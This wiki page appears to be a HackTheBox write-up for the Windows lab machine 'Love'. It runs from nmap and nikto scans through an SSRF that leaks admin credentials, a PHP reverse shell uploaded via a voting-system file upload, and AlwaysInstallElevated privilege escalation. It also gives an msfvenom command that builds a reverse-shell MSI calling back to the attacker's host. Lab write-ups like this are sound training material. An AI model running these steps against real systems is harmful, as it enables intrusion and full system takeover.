imported>Aghanim at 22:30, 28 January 2022

2022-01-28T22:30:58Z

New page

{{Infobox WriteUp
| name = Love
| platform = HackTheBox
| os = Windows
| difficulty = Easy
| techniques = SSRF, AlwaysInstallElevated
}}

[[File:2022-01-image-123.png|thumb]]

This Windows machine have a SSRF vulnerability. Through SSRF we get credentials to a webserver hosting a voting system, that have a upload RCE that I'll abuse to get reverse shell. The user have a registery that allows us to install .msi files as NT AUTHORITY\SYSTEM, giving is administrator access.

----

I'll start with a NMAP scan.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# nmap -p- --min-rate 10000 10.10.10.239 -oN nmap.port
Starting Nmap 7.92 ( https://nmap.org ) at 2022-01-23 16:09 EST
Warning: 10.10.10.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.239
Host is up (0.069s latency).
Not shown: 65461 closed tcp ports (reset), 55 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
3306/tcp open mysql
5000/tcp open upnp
5040/tcp open unknown
5985/tcp open wsman
5986/tcp open wsmans
7680/tcp open pando-pub
47001/tcp open winrm
49664/tcp open unknown
49665/tcp open unknown
49666/tcp open unknown
49667/tcp open unknown
49668/tcp open unknown
49669/tcp open unknown
49670/tcp open unknown

┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# cat nmap.result 1 ⨯
# Nmap 7.92 scan initiated Sun Jan 23 16:05:38 2022 as: nmap -sC -sV -p- --min-rate 10000 -oN nmap.result 10.10.10.239
Warning: 10.10.10.239 giving up on port because retransmission cap hit (10).
Nmap scan report for 10.10.10.239
Host is up (0.031s latency).
Not shown: 65015 closed tcp ports (reset), 501 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: Voting System using PHP
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
443/tcp open ssl/http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
| tls-alpn:
|_ http/1.1
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
| ssl-cert: Subject: commonName=staging.love.htb/organizationName=ValentineCorp/stateOrProvinceName=m/countryName=in
| Not valid before: 2021-01-18T14:00:16
|_Not valid after: 2022-01-18T14:00:16
|_ssl-date: TLS randomness does not represent time
|_http-title: 403 Forbidden
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
3306/tcp open mysql?
5000/tcp open http Apache httpd 2.4.46 (OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_http-title: 403 Forbidden
5040/tcp open unknown
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
5986/tcp open ssl/http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| tls-alpn:
|_ http/1.1
|_ssl-date: 2022-01-23T21:32:16+00:00; +23m28s from scanner time.
|_http-title: Not Found
| ssl-cert: Subject: commonName=LOVE
| Subject Alternative Name: DNS:LOVE, DNS:Love
| Not valid before: 2021-04-11T14:39:19
|_Not valid after: 2024-04-10T14:39:19
|_http-server-header: Microsoft-HTTPAPI/2.0
7680/tcp open pando-pub?
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: Hosts: www.example.com, LOVE, www.love.htb; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery:
| OS: Windows 10 Pro 19042 (Windows 10 Pro 6.3)
| OS CPE: cpe:/o:microsoft:windows_10::-
| Computer name: Love
| NetBIOS computer name: LOVE\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-01-23T13:32:03-08:00
| smb-security-mode:
| account_used:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
|_clock-skew: mean: 2h23m28s, deviation: 4h00m01s, median: 23m27s
| smb2-time:
| date: 2022-01-23T21:32:06
|_ start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Jan 23 16:08:49 2022 -- 1 IP address (1 host up) scanned in 191.40 seconds

</syntaxhighlight>

I'll note a couple of things before moving forward.

* The domain is '''love.htb'''. * There is also a subdomain '''staging.love.htb'''.* The webserver allows both HTTP and HTTPS

=== love.htb ===

[[File:2022-01-Pasted-image-20220124225250.png|thumb]]

It requires a Voters ID, which I dont have.

=== staging.love.htb ===

[[File:2022-01-Pasted-image-20220123222631.png|thumb]]

There is a "Free File Scanner" running on staging.love.htb/beta.php. This is probably vulnerable to SSRF and we could list resources we otherwise wouldnt be allowed to view.

=== https://love.htb ===

Vising https gives us a forbidden error.

[[File:2022-01-Pasted-image-20220124225310.png|thumb]]

Before moving forward I like to run '''nikto '''scan against the webserver.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# cat nikto.result 4 ⨯
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 10.10.10.239
+ Target Hostname: 10.10.10.239
+ Target Port: 80
+ Start Time: 2022-01-23 16:12:03 (GMT-5)
---------------------------------------------------------------------------
+ Server: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
+ Cookie PHPSESSID created without the httponly flag
+ Retrieved x-powered-by header: PHP/7.3.27
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /includes/: Directory indexing found.
+ OSVDB-3092: /includes/: This might be interesting...
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3268: /icons/: Directory indexing found.
+ OSVDB-3268: /images/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ OSVDB-3092: /Admin/: This might be interesting...
+ 8672 requests: 0 error(s) and 15 item(s) reported on remote host
+ End Time: 2022-01-23 16:18:57 (GMT-5) (414 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested

</syntaxhighlight>

There is a subdirectory called '''/admin'''.

[[File:2022-01-Pasted-image-20220124225730.png|thumb]]

== Initial Acces - SSRF ==

SSRF is when a malicious user cause the webserver to make an additional or edited HTTP request to the resource of the attacker’s choosing. Since we have a couple ports open we could try to make a request to the webserver. After some enumeration I found that making a request to '''http://127.0.0.1:5000''' gives us credentials to voting systems admin panel we found earlier.

[[File:2022-01-Pasted-image-20220124225216.png|thumb]]

After logging in, we are presented with a admin panel.

[[File:2022-01-Pasted-image-20220124225826.png|thumb]]

== Shell as Phoebe ==

Using '''searchsploit '''we find that voting system is vulnerable to upload remote code exection.

[[File:2022-01-Pasted-image-20220124225525.png|thumb]]

Looking at the explanation for this RCE, we have to add a candidate and its possible to upload arbritray file when it asks us to upload a photo.

[[File:2022-01-Pasted-image-20220124230639.png|thumb]]

So first we have a to create '''Position'''.

[[File:2022-01-Pasted-image-20220124230657.png|thumb]]

Then I'll add a candidate and upload a PHP reverse shell.

[[File:2022-01-Pasted-image-20220124230717.png|thumb]]

Visiting '''/images''' we can see that the payload is uploaded. I'll start a netcat listener and open the shell.

[[File:2022-01-Pasted-image-20220124230739-1.png|thumb]]

[[File:2022-01-Pasted-image-20220124233229.png|thumb]]

== Shell as NT AUTHORITY\SYSTEM ==

I'll use carlospolops '''winpeas.exe''' to enumerate possible privilege escalation vectors.

I notice these two lines in the scan.

[[File:2022-01-Pasted-image-20220124234737.png|thumb]]

Reading '''hacktricks '''link.

[[File:2022-01-Pasted-image-20220124234910.png|thumb]]

Great, so I'll create a .msi payload using msfvenom and upload it to the machine.

<syntaxhighlight lang="bash">
┌──(root💀kali)-[/home/aghanim/Desktop/HTB/love]
└─# msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp LHOST=10.10.14.17 LPORT=5555 -f msi -o rev.msi
</syntaxhighlight>

After uploading it to the machine, I'll run the msi payload and start another netcat listener.

[[File:2022-01-Pasted-image-20220125000657.png|thumb]]

[[File:2022-01-Pasted-image-20220125000734.png|thumb]]

== What I've learned ==

* If there is a possible SSRF vulnerabilty try to make a request to internal resources to see if there is anything intersting. * Enumerating registry could give us a hint at possible privesc vectors. In this instance Phoebe could install msi file as NT AUTHORITY\SYSTEM. * No every reverse shell will work right away. I had to try a couple of times to get the PHP reverse shell to give me a stable connection.

[[Category:HackTheBox]]
[[Category:Windows]]
[[Category:Write-ups]]

Write-ups/HTB/Love - Revision history

imported>Aghanim at 22:30, 28 January 2022